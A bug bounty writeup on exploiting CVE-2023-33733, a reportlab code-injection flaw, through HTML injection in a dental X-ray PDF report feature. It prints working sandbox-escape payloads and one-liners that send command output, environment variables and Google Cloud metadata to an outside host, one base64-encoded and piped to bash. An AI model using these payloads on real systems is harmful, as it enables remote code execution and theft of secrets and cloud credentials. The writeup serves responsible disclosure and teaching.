Exploiting CVE-2023-33733 RCE via HTMLi in Reportlab in a Bug Bounty Program

This is probably the best bug I have ever found on a bug bounty target, whether you judge it by impact or by how cool the exploit is.

In this writeup I will go through the steps I took to identify what the target was using to generate PDFs, and then how I was able to confirm the RCE.

You can find more details of the exploit I used here: https://security.snyk.io/vuln/SNYK-PYTHON-REPORTLAB-5664897

CVE-2023-33733 was found by Elyas Damej, a pentester from Cure53, so props to him for finding this and for sharing the PoC in so much detail: https://github.com/c53elyas/CVE-2023-33733

The target announced that a new scope had been added to their program, so without wasting any time I jumped right back in to see if I could find something there.

I started by going through the application to see what functionality it had. There was very little to test: the application was designed for dentists, who could upload their patients' X-ray reports (png, jpg, etc. were allowed).

After uploading the X-ray image you can edit some fields such as Patient Name, Date of Report, Comments, etc. Once you have added all the required details you can print the X-ray report, which contains the X-ray image, patient name, date of report, etc.

I am always fascinated by such PDF render endpoints, and have exploited some in the past too: https://x.com/sudhanshur705/status/1618608391391449090?s=20

And more recently this one, where together with rootxharsh and iamnooob I managed to pwn a target: https://twitter.com/sudhanshur705/status/1694404470317420708

I find them fascinating because they most often deal with HTML that is later converted to PDF, either by a library (PrinceXML, reportlab, dompdf, etc.) or by headless Chrome taking a screenshot that is then converted to PDF. If you manage to get HTML/JS injection in the HTML template that is passed to the PDF generator process, things get really interesting.

The interesting things range from SSRF, where an iframe lets you try loading internal resources or cloud metadata, to a file URI that leaks local files. With JavaScript you can even use a fetch call to try reading responses from internal resources; in such setups the renderer often has no concept of the same-origin policy, or it is disabled for specific reasons. There are even ways to bypass SOP by having two A records, one that resolves to the internal IP you want to reach and another that resolves to the public IP of your VPS.

You can find details about it in this CTF challenge writeup by @strellic: https://brycec.me/posts/corctf_2023_challenges#pdf-pal

Quoting it from the writeup above:

But the general idea is that we use multiple A records, one with the IP for our server, then one for 0.0.0.0. When the admin bot goes to our domain, it resolves the IP for our server and loads a custom payload page. Then, we kill our server. Then, when it attempts to load a new resource on the same-origin, it can’t access it at our IP (since our server is dead), and so falls back to 0.0.0.0, reading a localhost resource. Since this is same-origin, we can read the response.

Back to the reportlab cve finding on my target.

This was the request made when I clicked on the Generate Report button: [screenshot: request captured in Burp Suite]

The generated report was then visible in the application.

I downloaded the PDF and used exiftool to check whether I could identify the software used in the PDF generation process, but there was no information.
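The same kind of metadata check can be sketched in Python without exiftool. This is a minimal sketch that only looks for plain, unencrypted /Producer and /Creator literal strings in the raw bytes; the function name `pdf_info_strings` and the sample bytes are made up for illustration and are not taken from the target.

```python
import re

def pdf_info_strings(data: bytes) -> dict:
    """Return any literal /Producer and /Creator strings found in raw PDF bytes."""
    found = {}
    for key in (b"Producer", b"Creator"):
        # Matches simple literal strings such as: /Producer (Some Library 1.0)
        match = re.search(rb"/" + key + rb"\s*\(([^)]*)\)", data)
        if match:
            found[key.decode()] = match.group(1).decode("latin-1")
    return found

# Hypothetical sample document, only here to exercise the function.
sample = b"%PDF-1.4\n1 0 obj\n<< /Producer (ExampleLib 1.0) >>\nendobj\n"
print(pdf_info_strings(sample))
```

An empty result, as on this target, simply means the generator left no such strings in the file, so other fingerprinting is needed.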

I then added some HTML in the comment parameter:

"><img src=https://myhost>

I used such payloads to fingerprint the library/browser they might be using to render the html code server side.

I made the changes, and when I pressed the Generate Report button the request failed. I checked the response and this error was there:

{
"\nparagraph text '<para>Note: <font color=\"#484848\"><img src=x></font></para>' caused exception Parse error: saw </font> instead of expected </img>"
}

The moment I saw that error I was like woooow!!! After that I was pretty confident that I was going to find something critical there.

My input was exactly this: <img src=x>. From the error it seems the server does no sanitization of the user input and uses it directly in the HTML file.

<para>Note: <font color="#484848"></font></para>

The user-controllable input ends up between <font color="#484848"> and </font>. As there is no sanitization, I can also include arbitrary HTML, which is then passed to the PDF generator library to be converted to PDF.

The error indicates that the library’s HTML parser failed to parse the provided HTML because our input <img src=x> doesn’t have a matching closing tag.
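The same class of failure is easy to reproduce with any strict parser. The sketch below uses Python's standard `xml.etree.ElementTree` purely as an analogy; it is not reportlab's own parser, and the helper name `parses` is hypothetical.

```python
import xml.etree.ElementTree as ET

def parses(markup: str) -> bool:
    """Return True if a strict XML parser accepts the markup."""
    try:
        ET.fromstring(markup)
        return True
    except ET.ParseError:
        return False

# <img> is never closed, so </font> arrives while <img> is still open.
unclosed = '<para>Note: <font color="#484848"><img src="x"></font></para>'
# A self-closing <img/> keeps the tags balanced.
closed = '<para>Note: <font color="#484848"><img src="x"/></font></para>'

print(parses(unclosed))  # False
print(parses(closed))    # True
```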

With the next payload a different error message was shown. I put my host in the src attribute so that when the image tag renders, a request is sent to my server; the User-Agent in the logs should then tell me which library it is. I also added an onerror attribute just to see what would happen:

<img src=https://myhost onerror=alert()>

This time another error was triggered:

["\nparagraph text '<para>Note: <font color=\"#484848\">test\"><img src=https://myhost onerror=alert()></font></para>' caused exception paraparser: syntax error: invalid attribute name onerror attrMap=['height', 'src', 'valign', 'width']"]

The error message is already very descriptive about where the problem is: the onerror attribute is not in the attrMap list (consider it a list of whitelisted attribute names), which is why the error was triggered.

Then I removed the onerror attribute and tested it to identify the pdf generator library:

User-Agent: Python-urllib/3.10

Woah, cool, so the backend is Python. When it comes to Python, one of the most popular libraries for generating PDFs is reportlab (https://www.reportlab.com/).
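A listener for this kind of fingerprinting can be sketched with the standard library alone. This is a minimal sketch, not the setup used here; the names `LogUserAgent`, `seen_user_agents` and `start_listener` are hypothetical, and a real callback host would need to be reachable from the target.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

seen_user_agents = []  # every User-Agent header received so far

class LogUserAgent(BaseHTTPRequestHandler):
    def do_GET(self):
        # Record who is fetching the "image" and answer with an empty 200.
        seen_user_agents.append(self.headers.get("User-Agent", ""))
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):
        pass  # keep the console quiet; we only care about the header

def start_listener(host="127.0.0.1", port=0):
    """Start the listener in a background thread and return the server object."""
    server = HTTPServer((host, port), LogUserAgent)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

A request from Python's urllib shows up as `Python-urllib/<version>`, which is the pattern seen in the log above.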

I am no stranger to reportlab. I have looked into its source in the past, trying to find a 0-day in it, but failed miserably as I suck at source code review (still learning). Still, I got a basic idea of how reportlab works. I already had a repo where I had pushed the reportlab source code, so I copied part of the error message and searched there.

Ah nice, found a match for invalid attribute name: https://github.com/search?q=repo%3ASudistark%2Freportlab-diff+%22invalid+attribute+name%22&type=code

https://github.com/Sudistark/reportlab-diff/blob/f6ea20518ca3caafee27ba5301bc9e079972dd98/reportlab/src/reportlab/platypus/paraparser.py#L3080

    def getAttributes(self,attr,attrMap):
        A = {}
        for k, v in attr.items():
            if not self.caseSensitive:
                k = k.lower()
            if k in attrMap:
                j = attrMap[k]
                func = j[1]
                if func is not None:
                    #it's a function
                    v = func(self,v) if isinstance(func,_ExValidate) else func(v)
                A[j[0]] = v
            else:
                self._syntax_error('invalid attribute name %s attrMap=%r'% (k,list(sorted(attrMap.keys()))))

OK, so this exactly matched the error message that was shown on the website.
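To see how a whitelist like this produces that exact message, here is a simplified standalone sketch of the same idea. It is not reportlab's implementation: `get_attributes` and `IMG_ATTR_MAP` are hypothetical names, and the map only mirrors the four attribute names from the error message.

```python
def get_attributes(attr: dict, attr_map: dict) -> dict:
    """Validate attributes against a whitelist, raising on unknown names."""
    result = {}
    for key, value in attr.items():
        key = key.lower()
        if key not in attr_map:
            raise ValueError(
                "invalid attribute name %s attrMap=%r" % (key, sorted(attr_map))
            )
        target_name, convert = attr_map[key]
        # Apply the optional converter, otherwise keep the raw value.
        result[target_name] = convert(value) if convert is not None else value
    return result

# Whitelist taken from the attrMap list shown in the error message.
IMG_ATTR_MAP = {
    "src": ("src", None),
    "width": ("width", None),
    "height": ("height", None),
    "valign": ("valign", None),
}

print(get_attributes({"src": "https://myhost"}, IMG_ATTR_MAP))
try:
    get_attributes({"src": "https://myhost", "onerror": "alert()"}, IMG_ATTR_MAP)
except ValueError as exc:
    print(exc)
```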

I was already aware of the RCE CVE that had recently come out for reportlab.

Elyas shared full details of how the payload works, so if you are interested check out his repo: https://github.com/c53elyas/CVE-2023-33733

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('touch /tmp/exploited') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
                exploit
</font></para>

He explains the sandbox bypass line by line; you can execute it in the Python console as you read along to understand it better.

Even after reading his writeup the payload still looked difficult to understand, so I executed it in the Python console line by line, which helped a lot.
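One piece that is easy to try in a console is the `Word` class itself. The sketch below builds it exactly as the payload does and only shows its observable behaviour in plain Python; how reportlab's checks consume the first comparison is covered in Elyas's repo and is not reproduced here. The names `org_type_fun` and `sample` are only for this illustration.

```python
org_type_fun = type(type(1))  # type(1) is int, and type(int) is type itself

Word = org_type_fun(
    "Word",
    (str,),
    {
        "mutated": 1,
        "startswith": lambda self, x: False,
        "__eq__": lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x,
        "mutate": lambda self: {setattr(self, "mutated", self.mutated - 1)},
        "__hash__": lambda self: hash(str(self)),
    },
)

w = Word("__globals__")
print(w.startswith("__"))   # False: the overridden startswith always says no
print(w == "__globals__")   # False: first comparison, mutated goes 1 -> 0
print(w == "__globals__")   # True: second comparison, mutated goes 0 -> -1

def sample():
    pass

# Once the comparisons are truthful, the object works as a normal attribute name.
print(getattr(sample, w) is sample.__globals__)
```

So the string hides its leading underscores, fails one equality check, and after that behaves like the real attribute name.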

After I confirmed that reportlab was in use, I used the following payload to check whether the target was indeed running the vulnerable version.

curl https://myhost.com

<para>
              <font color="[ [ getattr(pow,Word('__globals__'))['os'].system('curl https://myhost.com') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">
                exploit
                </font>
            </para>

Nope, it didn’t work. The PDF was successfully generated but no pingbacks were sent to my server. I changed the curl command to ping and wget in the hope of getting at least a DNS interaction, but nope.

At this point I wondered: are they really using the vulnerable version?

I needed to find the answer for this, which could only be done by using a local setup.

Using the same sample vulnerable code which Elyas shared in his repo I could confirm the exploit locally: https://github.com/c53elyas/CVE-2023-33733/blob/master/code-injection-poc/poc.py

from reportlab.platypus import SimpleDocTemplate, Paragraph
from io import BytesIO
stream_file = BytesIO()
content = []

def add_paragraph(text, content):
    """ Add paragraph to document content"""
    content.append(Paragraph(text))

def get_document_template(stream_file: BytesIO):
    """ Get SimpleDocTemplate """
    return SimpleDocTemplate(stream_file)

def build_document(document, content, **props):
    """ Build pdf document based on elements added in `content`"""
    document.build(content, **props)



doc = get_document_template(stream_file)
#
# THE INJECTED PYTHON CODE THAT IS PASSED TO THE COLOR EVALUATOR
#[
#    [
#        getattr(pow, Word('__globals__'))['os'].system('touch /tmp/exploited')
#        for Word in [
#            orgTypeFun(
#                'Word',
#                (str,),
#                {
#                    'mutated': 1,
#                    'startswith': lambda self, x: False,
#                    '__eq__': lambda self, x: self.mutate()
#                    and self.mutated < 0
#                    and str(self) == x,
#                    'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)},
#                    '__hash__': lambda self: hash(str(self)),
#                },
#            )
#        ]
#    ]
#    for orgTypeFun in [type(type(1))]
#]

add_paragraph("""
            <para>
              <font color="[ [ getattr(pow,Word('__globals__'))['os'].system('touch /tmp/exploited') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">
                exploit
                </font>
            </para>""", content)
build_document(doc, content)

You can see the exploit works in reportlab v3.6.12.

Let’s see now what happens in the fixed version:

See the error? The exploit failed:

  File "/home/runner/VelvetyFuchsiaCompiler/venv/lib/python3.10/site-packages/reportlab/lib/colors.py", line 931, in __call__
    raise ValueError('Invalid color value %r' % arg)
ValueError: 
paragraph text '<para> <font color="[ [ getattr(pow,Word(\'__globals__\'))[\'os\'].system(\'touch /tmp/exploited\') for Word in [orgTypeFun(\'Word\', (str,), { \'mutated\': 1, \'startswith\': lambda self, x: False, \'__eq__\': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, \'mutate\': lambda self: {setattr(self, \'mutated\', self.mutated - 1)}, \'__hash__\': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and \'red\'"> exploit </font> </para>' caused exception Invalid color value "[ [ getattr(pow,Word('__globals__'))['os'].system('touch /tmp/exploited') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'"

With the old version no error is triggered, while the fixed version raises an error for the same payload.

When I used the same PoC on my target no error was shown and the PDF was generated successfully, which indicated that they were indeed using a vulnerable version; otherwise an error would have been shown.
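That reasoning can be written down as a small heuristic. This is only a sketch of the decision described above, with a hypothetical function name and return labels; it assumes the application surfaces reportlab's exception text in its response, as this target did for the earlier parse errors.

```python
def classify_reportlab_response(pdf_generated: bool, body: str) -> str:
    """Guess the patch state from how the app reacted to the PoC payload."""
    if "Invalid color value" in body:
        # The fixed version rejects the expression in the color attribute.
        return "likely patched"
    if pdf_generated:
        # No complaint about the color value and a PDF came back.
        return "possibly vulnerable"
    return "inconclusive"

print(classify_reportlab_response(True, ""))
print(classify_reportlab_response(False, "caused exception Invalid color value \"[ [ ...\""))
```

A successful PDF alone does not prove code execution, which is why an out-of-band callback was still needed.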

Recently, while collaborating with @rootxharsh, he had a similar scenario where curl, wget, and ping didn’t work, so it was concluded that the headless Chrome process might be running with the sandbox enabled. In fact, when @iamnoooob later checked the same target, he used a reverse shell and received a callback in no time. When Harsh then checked from the shell why curl, wget, and ping hadn’t worked, he found that none of them existed on that box. Shit happens!!

As curl etc. didn’t work in my case either, I thought why not try the Python requests module instead.

<font color="[ [ [ [ ftype(ctype(0, 0, 0, 0, 3, 67, b't\\x00d\\x01\\x83\\x01\\xa0\\x01d\\x02\\xa1\\x01\\x01\\x00d\\x00S\\x00', (None, 'requests', 'https://myhost'), ('__import__','get'), (), '<stdin>', '', 1, b'\\x12\\x01'), {})() for ftype in [type(lambda: None)] ] for ctype in [type(getattr(lambda: {None}, Word('__code__')))] ] for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))]] and 'red'">exploit</font>

I took the payload from the Snyk advisory (https://security.snyk.io/vuln/SNYK-PYTHON-REPORTLAB-5664897) and replaced only this part:

- (None, 'os', 'touch /tmp/exploited'), ('__import__', 'system')
+ (None, 'requests', 'https://myhost'), ('__import__','get')
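Why swapping just those two tuples is enough becomes clearer once the bytecode string from the payload is decoded. The sketch below decodes it by hand using the CPython 3.8 to 3.10 opcode numbers, which is an assumption about the target's interpreter (consistent with the Python-urllib/3.10 User-Agent seen earlier); the names `OPNAMES` and `decode` are hypothetical.

```python
# Opcode numbers as used by CPython 3.8-3.10 (two bytes per instruction).
OPNAMES = {
    1: "POP_TOP",
    83: "RETURN_VALUE",
    100: "LOAD_CONST",
    116: "LOAD_GLOBAL",
    131: "CALL_FUNCTION",
    160: "LOAD_METHOD",
    161: "CALL_METHOD",
}

CODE = b"t\x00d\x01\x83\x01\xa0\x01d\x02\xa1\x01\x01\x00d\x00S\x00"
CONSTS = (None, "requests", "https://myhost")
NAMES = ("__import__", "get")

def decode(code, consts, names):
    """Turn (opcode, argument) byte pairs into readable steps."""
    steps = []
    for i in range(0, len(code), 2):
        op, arg = code[i], code[i + 1]
        name = OPNAMES[op]
        if name == "LOAD_CONST":
            steps.append((name, consts[arg]))   # argument indexes the constants tuple
        elif name in ("LOAD_GLOBAL", "LOAD_METHOD"):
            steps.append((name, names[arg]))    # argument indexes the names tuple
        else:
            steps.append((name, arg))
    return steps

for step in decode(CODE, CONSTS, NAMES):
    print(step)
```

Read top to bottom, the steps amount to `__import__('requests').get('https://myhost')`. The bytecode only refers to constants and names by index, so changing the two tuples changes which module, method and argument are used without touching the bytes.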

Pretty cool: with this payload, I received a pingback on my server:

User-Agent: python-requests/2.31.0

This confirmed that I could execute arbitrary code on the system. I needed some more info before writing the report.

I modified the PoC and relied on the following commands to send the command output to my server:

python3 -c "import requests;requests.get('https://en2celq7rewbul.m.pipedream.net/$(id)')"

python3 -c "import requests;requests.get('https://en2celq7rewbul.m.pipedream.net/$(cat /proc/self/environ)')"

(None, 'os', 'echo cHl0aG9uMyAtYyAiaW1wb3J0IHJlcXVlc3RzO3JlcXVlc3RzLmdldCgnaHR0cHM6Ly9lbjJjZWxyN3Jld2J1bC5tLnBpcGVkcmVhbS5uZXQvJChjYXQgL3Byb2Mvc2VsZi9lbnZpcm9uKScpIg== | base64 -d|bash'), ('__import__', 'system')

<font color="[ [ [ [ ftype(ctype(0, 0, 0, 0, 3, 67, b't\\x00d\\x01\\x83\\x01\\xa0\\x01d\\x02\\xa1\\x01\\x01\\x00d\\x00S\\x00', (None, 'os', 'echo cHl0aG9uMyAtYyAiaW1wb3J0IHJlcXVlc3RzO3JlcXVlc3RzLmdldCgnaHR0cHM6Ly9lbjJjZWxyN3Jld2J1bC5tLnBpcGVkcmVhbS5uZXQvJChjYXQgL3Byb2Mvc2VsZi9lbnZpcm9uKScpIg== | base64 -d|bash'), ('__import__', 'system'), (), '<stdin>', '', 1, b'\\x12\\x01'), {})() for ftype in [type(lambda: None)] ] for ctype in [type(getattr(lambda: {None}, Word('__code__')))] ] for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))]] and 'red'">exploit</font>
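The `echo ... | base64 -d|bash` wrapper used above can be generated with a few lines of Python. This is a minimal sketch with a hypothetical helper name; the writeup does not say why base64 was used, but a likely reason (an assumption) is that it avoids nesting shell quotes inside the already heavily quoted payload.

```python
import base64

def wrap_command(command: str) -> str:
    """Wrap a shell command in the echo | base64 -d | bash form used in the payload."""
    encoded = base64.b64encode(command.encode()).decode()
    # The base64 alphabet contains no quotes or spaces, so no extra escaping is needed.
    return "echo %s | base64 -d|bash" % encoded

print(wrap_command("id"))  # echo aWQ= | base64 -d|bash
```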

The contents of /proc/self/environ were really, really sensitive, so I submitted the report at this point. As the server responsible for generating PDFs was hosted on Google Cloud, I could also fetch the metadata response.

To confirm this I used the below payload:

python3 -c "import requests;import base64;metadata_url = 'http://169.254.169.254/computeMetadata/v1/instance/?recursive=true';metadata_headers = {'Metadata-Flavor': 'Google'};response = requests.get(metadata_url, headers=metadata_headers);encoded_metadata = base64.b64encode(response.text.encode()).decode();target_server_url = 'https://en2celq7rewbul.m.pipedream.net/';data_payload = {'metadata': encoded_metadata};requests.post(target_server_url, json=data_payload)"

Beautified version of the one-liner for you :)

import requests
import base64

metadata_url = 'http://169.254.169.254/computeMetadata/v1/instance/?recursive=true'

metadata_headers = {'Metadata-Flavor': 'Google'}  # custom header required by the metadata server; we have RCE so we can add it easily ;)

response = requests.get(metadata_url, headers=metadata_headers)

encoded_metadata = base64.b64encode(response.text.encode()).decode()

target_server_url = 'https://en2celq7rewbul.m.pipedream.net/'

data_payload = {'metadata': encoded_metadata}

requests.post(target_server_url, json=data_payload)

The code above makes a request to the Google Cloud metadata endpoint and then sends the JSON response, base64-encoded, to my server. Finally, I also confirmed that I could fetch an access_token for the service account in use.

After confirming all this I ceased my testing and reported everything to the program.

The program was really happy with the report; although their maximum payout was 3k, they paid 4.5k for this bug.